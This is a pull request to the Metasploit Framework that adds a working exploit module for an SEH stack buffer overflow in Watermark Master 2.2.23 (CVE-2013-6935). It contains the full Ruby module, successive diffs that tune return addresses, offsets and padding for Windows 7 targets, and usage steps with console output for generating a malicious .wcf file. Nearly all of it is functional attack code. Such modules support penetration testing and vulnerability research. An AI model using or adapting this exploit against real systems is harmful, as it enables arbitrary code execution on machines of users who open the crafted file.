### PR TITLE
Add Watermark Master Fileformat Exploit

### DIFF
--- a/modules/exploits/windows/fileformat/watermark_master.rb
+++ b/modules/exploits/windows/fileformat/watermark_master.rb
@@ -1,0 +1,93 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'    => 'Watermark Master Buffer Overflow (SEH)',
+      'Description'  => %q{
+          This module exploits a stack based buffer overflow in Watermark Master 2.2.23 when
+          processing a specially crafted .WCF file. This vulnerability could be
+          exploited by a remote attacker to execute arbitrary code on the target
+          machine by enticing a user of Watermark Master to open a malicious .WCF file.
+      },
+      'License'    => MSF_LICENSE,
+      'Author'    =>
+        [
+          'metacom',  # Original discovery
+          'Andrew Smith',  # MSF Module
+        ],
+      'References'  =>
+        [
+          [ 'OSVDB', '99226' ],
+          [ 'CVE', '2013-6935'],
+          [ 'EBD', '29327' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'ExitFunc' => 'process',
+        },
+      'Platform'  => 'win',
+      'Payload'  =>
+        {
+          'BadChars' => "\x00\x0a\x0d\x3c\x22\x26",
+          'DisableNops' => true,
+          'Space' => 7276
+        },
+
+      'Targets'    =>
+        [
+          [ 'Watermark Master 2.2.23',
+            {
+              'Ret'     =>  0x10015f2d, #p/p/r | CommonClassesMFC.dll
+              'Offset'  =>  516
+            }
+          ],
+        ],
+      'Privileged'  => false,
+      'DisclosureDate'  => 'Nov 1 2013',
+      'DefaultTarget'  => 0))
+
+    register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.wcf']),], self.class)
+
+  end
+
+  def exploit
+
+    buffer = rand_text(target['Offset'])
+    buffer << generate_seh_record(target.ret)
+    buffer << make_nops(100)
+    buffer << payload.encoded
+    buffer << rand_text(10000)
+
+    file = %Q|<?xml version="1.0" encoding="Windows-1252" ?><config ver="2.2.23.00">
+<cols name="Files"/>
+<cols name="Profiles">
+<Property name="Profile">
+<cols name="Watermarks"/>
+<cols name="Timelines"/>
+<cols name="Streams">
+<Property name="Stream">
+<Value name="SourcePath" type="8" value="#{buffer}"/>
+</Property>
+</cols>
+<cols name=""/>
+</Property>
+</cols>
+</config>|
+
+    print_status("Creating '#{datastore['FILENAME']}' file ...")	
+    file_create(file)
+
+  end
+end
+

--- a/modules/exploits/windows/fileformat/watermark_master.rb
+++ b/modules/exploits/windows/fileformat/watermark_master.rb
@@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Payload'  =>
         {
           'BadChars' => "\x00\x0a\x0d\x3c\x22\x26",
-          'DisableNops' => true,
+          'DisableNops' => false,
           'Space' => 7276
         },
 
@@ -65,9 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     buffer = rand_text(target['Offset'])
     buffer << generate_seh_record(target.ret)
-    buffer << make_nops(100)
     buffer << payload.encoded
-    buffer << rand_text(10000)
 
     file = %Q|<?xml version="1.0" encoding="Windows-1252" ?><config ver="2.2.23.00">
 <cols name="Files"/>

--- a/modules/exploits/windows/fileformat/watermark_master.rb
+++ b/modules/exploits/windows/fileformat/watermark_master.rb
@@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
 </cols>
 </config>|
 
-    print_status("Creating '#{datastore['FILENAME']}' file ...")	
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
     file_create(file)
 
   end

--- a/modules/exploits/windows/fileformat/watermark_master.rb
+++ b/modules/exploits/windows/fileformat/watermark_master.rb
@@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'DefaultOptions' =>
         {
-          'ExitFunc' => 'process',
+          'EXITFUNC' => 'process',
         },
       'Platform'  => 'win',
       'Payload'  =>

--- a/modules/exploits/windows/fileformat/watermark_master.rb
+++ b/modules/exploits/windows/fileformat/watermark_master.rb
@@ -46,6 +46,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
       'Targets'    =>
         [
+		  [ 'Windows 7 x32 - Watermark Master 2.2.23',
+            {
+              'Ret'     =>  0x10015f2d, #p/p/r | CommonClassesMFC.dll
+              'Offset'  =>  516
+            }
+          ],
           [ 'Watermark Master 2.2.23',
             {
               'Ret'     =>  0x10015f2d, #p/p/r | CommonClassesMFC.dll
@@ -66,6 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
     buffer = rand_text(target['Offset'])
     buffer << generate_seh_record(target.ret)
     buffer << payload.encoded
+    buffer << rand_text(9000)
 
     file = %Q|<?xml version="1.0" encoding="Windows-1252" ?><config ver="2.2.23.00">
 <cols name="Files"/>

--- a/modules/exploits/windows/fileformat/watermark_master.rb
+++ b/modules/exploits/windows/fileformat/watermark_master.rb
@@ -46,15 +46,15 @@ class Metasploit3 < Msf::Exploit::Remote
 
       'Targets'    =>
         [
-		  [ 'Windows 7 x32 - Watermark Master 2.2.23',
+          [ 'Windows 7 x32 - Watermark Master 2.2.23',
             {
               'Ret'     =>  0x10015f2d, #p/p/r | CommonClassesMFC.dll
               'Offset'  =>  516
             }
           ],
-          [ 'Watermark Master 2.2.23',
+          [ 'Windows 7 x64 - Watermark Master 2.2.23',
             {
-              'Ret'     =>  0x10015f2d, #p/p/r | CommonClassesMFC.dll
+              'Ret'     =>  0x1001329a, #p/p/r | CommonClassesMFC.dll
               'Offset'  =>  516
             }
           ],

--- a/modules/exploits/windows/fileformat/watermark_master.rb
+++ b/modules/exploits/windows/fileformat/watermark_master.rb
@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
     buffer = rand_text(target['Offset'])
     buffer << generate_seh_record(target.ret)
     buffer << payload.encoded
-    buffer << rand_text(9000)
+    buffer << rand_text(18000 - buffer.length)
 
     file = %Q|<?xml version="1.0" encoding="Windows-1252" ?><config ver="2.2.23.00">
 <cols name="Files"/>


### PR DESCRIPTION
PR to add Watermark Master Fileformat Buffer Overflow Exploit (SEH).

Exploit overwrites SEH chain to hit shellcode.

CVE: 2013-6935
Vendor Homepage: http://www.videocharge.com
Original Advisory: https://www.exploit-db.com/exploits/29327/
Installer: https://www.exploit-db.com/apps/17c031722e03c01f7108d7d23a8ae609-WatermarkMaster_Install.exe
Tested on: Windows 7 x32
Bonus points: The application runs as a mandatory high integrity process :)

Usage:
Install target software
Run module
Open generated .wcf file with File->Open

Console Output:

```
msf > use exploit/watermark_master 
msf exploit(watermark_master) > show options

Module options (exploit/watermark_master):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.wcf          no        The file name.


Exploit target:

   Id  Name
   --  ----
   0   Watermark Master 2.2.23


msf exploit(watermark_master) > set payload windows/exec
payload => windows/exec
msf exploit(watermark_master) > set cmd mspaint.exe
cmd => mspaint.exe
msf exploit(watermark_master) > exploit

[*] Creating 'msf.wcf' file ...
[+] msf.wcf stored at /root/.msf4/local/msf.wcf
msf exploit(watermark_master) > 
```
